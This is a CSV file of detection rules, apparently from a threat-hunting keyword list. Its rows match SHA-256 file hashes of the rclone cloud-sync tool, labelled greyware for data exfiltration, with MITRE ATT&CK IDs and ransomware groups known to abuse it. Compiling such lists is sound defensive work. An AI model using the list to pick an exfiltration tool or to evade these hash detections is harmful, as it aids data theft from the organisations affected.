"*c88798691efdab2ca387d84d5803b4c388f6e7de7471a6222c9fad1914cb2fdf*",".{0,1000}c88798691efdab2ca387d84d5803b4c388f6e7de7471a6222c9fad1914cb2fdf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c9111589f5d92fa49c6fcd8993691158865e0ac95afe95bb1cc122c0a3b79e17*",".{0,1000}c9111589f5d92fa49c6fcd8993691158865e0ac95afe95bb1cc122c0a3b79e17.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c933a304bc8713f7b3916cd107f501070ab568b2f21793431f48a234502f671d*",".{0,1000}c933a304bc8713f7b3916cd107f501070ab568b2f21793431f48a234502f671d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c95ebf48bcef81e9ee296a803ca77244d111e35a55db9680c78b407ed99bb054*",".{0,1000}c95ebf48bcef81e9ee296a803ca77244d111e35a55db9680c78b407ed99bb054.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c96ecc29074845b030484359398988deef3ec8b0a4832de0ca9168e57c040cb8*",".{0,1000}c96ecc29074845b030484359398988deef3ec8b0a4832de0ca9168e57c040cb8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c9aa6d9d1d58919fe795c5209d984d31bcb3f1fccc455a0eaf0fe4a5007e03e6*",".{0,1000}c9aa6d9d1d58919fe795c5209d984d31bcb3f1fccc455a0eaf0fe4a5007e03e6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c9b8dc930557737b54503ce5572adcc11903b34136f5d1300d496db8063b6602*",".{0,1000}c9b8dc930557737b54503ce5572adcc11903b34136f5d1300d496db8063b6602.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c9bc2b37f1d79e9000ad8f53d185a28360f0d4d120e31bee0a57febb29eec08a*",".{0,1000}c9bc2b37f1d79e9000ad8f53d185a28360f0d4d120e31bee0a57febb29eec08a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*c9c6596491f95de71a67e8ca2732616e361b99317303f8d3a36fa946ca4d29f0*",".{0,1000}c9c6596491f95de71a67e8ca2732616e361b99317303f8d3a36fa946ca4d29f0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ca04fa1151686619776a2009397dc9aad61975155412527638072302ea850c68*",".{0,1000}ca04fa1151686619776a2009397dc9aad61975155412527638072302ea850c68.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ca1cb4b1d9a3e45d0704aa77651b0497eacc3e415192936a5be7f7272f2c94c5*",".{0,1000}ca1cb4b1d9a3e45d0704aa77651b0497eacc3e415192936a5be7f7272f2c94c5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ca528c7f40b7045ff516dc9758442d05010b84b4b3eab58281325f2e1a0f2b74*",".{0,1000}ca528c7f40b7045ff516dc9758442d05010b84b4b3eab58281325f2e1a0f2b74.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ca62758a8fca83e129d46d3105fd8a435c16e4f534ed662b04a4aca99b92b1e7*",".{0,1000}ca62758a8fca83e129d46d3105fd8a435c16e4f534ed662b04a4aca99b92b1e7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ca647f69c6bf2e831902a8bd9c5f4d16f7014314d5eeb94bd3a5389a92806de8*",".{0,1000}ca647f69c6bf2e831902a8bd9c5f4d16f7014314d5eeb94bd3a5389a92806de8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cabf1c59455c1447264baefba68d2a1a45d9a39a6ffbd8420c3b8c2ffda357a3*",".{0,1000}cabf1c59455c1447264baefba68d2a1a45d9a39a6ffbd8420c3b8c2ffda357a3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cac807c7a75909e5f8ce610b29078a2f5cce0d35a4ccdeface0d5c6809f0856c*",".{0,1000}cac807c7a75909e5f8ce610b29078a2f5cce0d35a4ccdeface0d5c6809f0856c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cadf80a863dc5b1e8222141517ffebe93bec28214dfa7d69407b98409355888d*",".{0,1000}cadf80a863dc5b1e8222141517ffebe93bec28214dfa7d69407b98409355888d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cb34300ac60c5a08687352721f380e736d6d3bad2e514866d27f9c581f1c19aa*",".{0,1000}cb34300ac60c5a08687352721f380e736d6d3bad2e514866d27f9c581f1c19aa.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cb7edcda37ef188dd5461a626f7b66d4c76676bc4cf05cba3bb4850dff3d8a2b*",".{0,1000}cb7edcda37ef188dd5461a626f7b66d4c76676bc4cf05cba3bb4850dff3d8a2b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cbb99174020be2e0d753674e303f2cfbc81d5f24b85c7c2f5c57ac5411720500*",".{0,1000}cbb99174020be2e0d753674e303f2cfbc81d5f24b85c7c2f5c57ac5411720500.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cbfa238232604e51fb4d47e27865ffb1fb993141634e249b246a0323ec3b1b4e*",".{0,1000}cbfa238232604e51fb4d47e27865ffb1fb993141634e249b246a0323ec3b1b4e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cbfeba0eec5935a088047fbb04249aeeeef35ea08f9eabfa0f6fadd113b6b522*",".{0,1000}cbfeba0eec5935a088047fbb04249aeeeef35ea08f9eabfa0f6fadd113b6b522.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cc0790a4988d294fbd9b971b3873b3cd48f4fd89bf2f23906b81f28f07c6d971*",".{0,1000}cc0790a4988d294fbd9b971b3873b3cd48f4fd89bf2f23906b81f28f07c6d971.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cc13a80a78d9a3b77899ba4a01c32c7c8034e6f06c8f4815411ddaac42e79ccf*",".{0,1000}cc13a80a78d9a3b77899ba4a01c32c7c8034e6f06c8f4815411ddaac42e79ccf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cc60aad6d5c0055d8f7d2711da000ca0d487f0fe43543977b248d5fbd95eb1f6*",".{0,1000}cc60aad6d5c0055d8f7d2711da000ca0d487f0fe43543977b248d5fbd95eb1f6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cc6356a6eb77a46e8d09d594d606a84d51b940023cefc616fb7d05faa36fd41f*",".{0,1000}cc6356a6eb77a46e8d09d594d606a84d51b940023cefc616fb7d05faa36fd41f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ccb13df8ba3d04697a15c8139018b213468ca3b51d725e5da173d516ee581b95*",".{0,1000}ccb13df8ba3d04697a15c8139018b213468ca3b51d725e5da173d516ee581b95.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ccd172f56541f0e08ef45066fadc2b75df8afe5e63869980f3dd921ff9c027ee*",".{0,1000}ccd172f56541f0e08ef45066fadc2b75df8afe5e63869980f3dd921ff9c027ee.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cd244dfaba5789845405fe15f8290113d7ae87540d228c2bdea105f0351ca270*",".{0,1000}cd244dfaba5789845405fe15f8290113d7ae87540d228c2bdea105f0351ca270.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cd38d27257bae0c4ff848fe924dc17d032f66032cd017d7e22b3b60457611269*",".{0,1000}cd38d27257bae0c4ff848fe924dc17d032f66032cd017d7e22b3b60457611269.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cd5dfb6374d84f6404352daf9fa4f0a788520a433f64b7df427f0fd4e1cb3c6a*",".{0,1000}cd5dfb6374d84f6404352daf9fa4f0a788520a433f64b7df427f0fd4e1cb3c6a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cdb048f2bfd02f40df74c87a94add49a9e1625ae31e37d7b478ddeebbbaa288a*",".{0,1000}cdb048f2bfd02f40df74c87a94add49a9e1625ae31e37d7b478ddeebbbaa288a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cdbe02812448aad7bf45b444a2d186a164af3c7275fd404ece8f93065fd33958*",".{0,1000}cdbe02812448aad7bf45b444a2d186a164af3c7275fd404ece8f93065fd33958.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*cddf06841ab4e00c5904081b9ce4a8cbd610d9b10fb324ffdde7beb4ed7488e9*",".{0,1000}cddf06841ab4e00c5904081b9ce4a8cbd610d9b10fb324ffdde7beb4ed7488e9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ce2af789fd2484320375766e2ecf96e7aecba5fa3d589b9462d7d251d322d532*",".{0,1000}ce2af789fd2484320375766e2ecf96e7aecba5fa3d589b9462d7d251d322d532.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*ce4adcbf74d8dff4dbc1658d4a4ba75f65c18f40be166e0482b9deefe6eb87cb*",".{0,1000}ce4adcbf74d8dff4dbc1658d4a4ba75f65c18f40be166e0482b9deefe6eb87cb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
